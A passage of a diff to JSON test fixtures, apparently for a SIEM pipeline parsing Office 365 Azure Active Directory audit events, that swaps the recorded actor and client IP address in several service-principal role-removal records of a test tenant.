Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -11920,9 +11920,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:17:45",
 "ExtendedProperties": [
 {
@@ -12156,7 +12156,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 
Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"V
alue\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -12186,9 +12186,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:45", "ExtendedProperties": [ { 
@@ -12422,7 +12422,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 
Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"e